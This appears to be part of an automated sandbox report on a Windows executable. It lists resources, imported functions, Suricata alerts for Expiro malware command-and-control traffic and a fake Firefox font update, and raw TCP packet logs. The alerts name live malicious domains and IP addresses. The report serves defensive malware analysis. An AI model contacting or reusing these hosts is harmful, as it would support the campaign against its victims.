                                                                                                                                                                                                                        RT_BITMAP0x12f9680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                                                                                        RT_BITMAP0x12fb380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                                                                                        RT_BITMAP0x12fd080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                                                                        RT_BITMAP0x12fed80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                                                                                        RT_BITMAP0x1300a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                        RT_BITMAP0x1302780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                                                                                        RT_BITMAP0x1304480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                        RT_BITMAP0x1306180xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                                                                                                        RT_ICON0x1307000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 15118 x 15118 px/m0.5735815602836879
                                                                                                                                                                                                                        RT_ICON0x130b680x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 15118 x 15118 px/m0.40081967213114755
                                                                                                                                                                                                                        RT_ICON0x1314f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15118 x 15118 px/m0.2732176360225141
                                                                                                                                                                                                                        RT_ICON0x1325980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 15118 x 15118 px/m0.1770746887966805
                                                                                                                                                                                                                        RT_ICON0x134b400x1c9fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9593285109867613
                                                                                                                                                                                                                        RT_DIALOG0x1367e00x52data0.7682926829268293
                                                                                                                                                                                                                        RT_DIALOG0x1368340x52data0.7560975609756098
                                                                                                                                                                                                                        RT_STRING0x1368880x380data0.3716517857142857
                                                                                                                                                                                                                        RT_STRING0x136c080x324data0.4564676616915423
                                                                                                                                                                                                                        RT_STRING0x136f2c0x9cdata0.717948717948718
                                                                                                                                                                                                                        RT_STRING0x136fc80xecdata0.6271186440677966
                                                                                                                                                                                                                        RT_STRING0x1370b40x1a4data0.5357142857142857
                                                                                                                                                                                                                        RT_STRING0x1372580x440data0.38235294117647056
                                                                                                                                                                                                                        RT_STRING0x1376980x39cdata0.38961038961038963
                                                                                                                                                                                                                        RT_STRING0x137a340x390data0.40789473684210525
                                                                                                                                                                                                                        RT_STRING0x137dc40x40cdata0.3783783783783784
                                                                                                                                                                                                                        RT_STRING0x1381d00x118data0.5214285714285715
                                                                                                                                                                                                                        RT_STRING0x1382e80xccdata0.6029411764705882
                                                                                                                                                                                                                        RT_STRING0x1383b40x208data0.5096153846153846
                                                                                                                                                                                                                        RT_STRING0x1385bc0x398data0.32608695652173914
                                                                                                                                                                                                                        RT_STRING0x1389540x38cdata0.3876651982378855
                                                                                                                                                                                                                        RT_STRING0x138ce00x294data0.42424242424242425
                                                                                                                                                                                                                        RT_RCDATA0x138f740x10data1.5
                                                                                                                                                                                                                        RT_RCDATA0x138f840x304data0.7007772020725389
                                                                                                                                                                                                                        RT_RCDATA0x1392880x3d9bDelphi compiled form 'TfmMain'0.29928349502250967
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d04c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d09c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_ICON0x13d0b00x4cdata0.8289473684210527

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                                                        user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                                                        kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                                                        kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                                                                                                        kernel32.dllSleep
                                                                                                                                                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                        comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                        comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                                                                                                                                                                                                                        winmm.dllPlaySoundA

                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                        2024-12-10T07:05:23.409269+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94970741.185.8.252443TCP
                                                                                                                                                                                                                        2024-12-10T07:05:36.062119+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.94970954.244.188.17780TCP
                                                                                                                                                                                                                        2024-12-10T07:05:36.654151+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949710158.101.44.24280TCP
                                                                                                                                                                                                                        2024-12-10T07:05:42.927993+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.9495511.1.1.153UDP
                                                                                                                                                                                                                        2024-12-10T07:05:42.961779+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.949718TCP
                                                                                                                                                                                                                        2024-12-10T07:05:42.961779+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.949718TCP
                                                                                                                                                                                                                        2024-12-10T07:05:44.675082+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.949720TCP
                                                                                                                                                                                                                        2024-12-10T07:05:44.675082+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.949720TCP
                                                                                                                                                                                                                        2024-12-10T07:05:45.913984+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949710158.101.44.24280TCP
                                                                                                                                                                                                                        2024-12-10T07:05:46.083996+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.9641351.1.1.153UDP
                                                                                                                                                                                                                        2024-12-10T07:05:46.096205+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.949723TCP
                                                                                                                                                                                                                        2024-12-10T07:05:46.096205+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.949723TCP
                                                                                                                                                                                                                        2024-12-10T07:05:54.224970+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.9516001.1.1.153UDP
                                                                                                                                                                                                                        2024-12-10T07:05:56.230614+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.9629251.1.1.153UDP
                                                                                                                                                                                                                        2024-12-10T07:06:43.512348+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.94973782.112.184.19780TCP

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.533701897 CET49706443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.533751011 CET4434970641.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.533849001 CET49706443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.548002958 CET49706443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.548055887 CET4434970641.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.548109055 CET49706443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.575608015 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.575642109 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.575735092 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.578800917 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.578819990 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.409179926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.409269094 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.540066004 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.540095091 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.540452957 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.597234964 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.802146912 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:23.843342066 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349503994 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349541903 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349551916 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349600077 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349626064 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349634886 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.349666119 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.402179956 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574441910 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574460983 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574512959 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574536085 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574546099 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574556112 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574564934 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574570894 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574579954 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574606895 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574657917 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632752895 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632766008 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632810116 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632886887 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632896900 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.633045912 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787298918 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787329912 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787483931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787483931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787499905 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787620068 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828469992 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828530073 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828572035 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828579903 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828603983 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828635931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863873005 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863928080 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863955021 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863960028 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.864053965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976447105 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976496935 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976521015 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976536989 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976577997 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002614021 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002636909 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002685070 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002696037 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002739906 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002773046 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025751114 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025804043 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025911093 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025911093 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025923014 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.026099920 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037827015 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037846088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037925005 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037936926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037982941 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051800013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051821947 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051871061 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051884890 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051930904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051930904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064749002 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064766884 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064831972 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064842939 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064898014 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165721893 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165746927 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165807962 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165819883 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165858030 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165895939 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185168028 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185184956 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185283899 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185300112 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185340881 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194875002 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194899082 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194936037 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194952011 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194967031 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194992065 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206054926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206073046 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206135988 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206151009 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206223965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217278957 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217333078 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217364073 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217375994 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217396975 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217416048 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224071026 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224092007 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224168062 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224180937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224225998 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.231241941 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.231264114 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.231355906 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.231368065 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.231414080 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.238928080 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.238948107 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.239115000 CET49707443192.168.2.941.185.8.252
